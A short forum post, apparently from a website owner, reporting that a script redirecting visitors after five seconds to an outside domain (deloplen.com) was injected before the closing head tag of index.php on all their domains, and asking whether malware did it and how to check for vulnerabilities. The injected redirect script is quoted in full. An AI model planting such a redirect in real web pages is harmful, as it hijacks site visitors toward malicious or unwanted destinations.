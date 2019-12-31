I have found that there is some redirection code get injected on my server index.php

<script> setTimeout(function(){ window.location.href = 'http://deloplen.com/afu.php?zoneid=2818299'; }, 5000); </script>

I have checked date and time and it was not updated. My server team inform me that your page has some vulnerability that’s why it happened.

It happened for all the domain and code get injected before end of head tag.

Does it really happened by any malware.If it true then let me know.

What are the different technique to check code vulnerability ?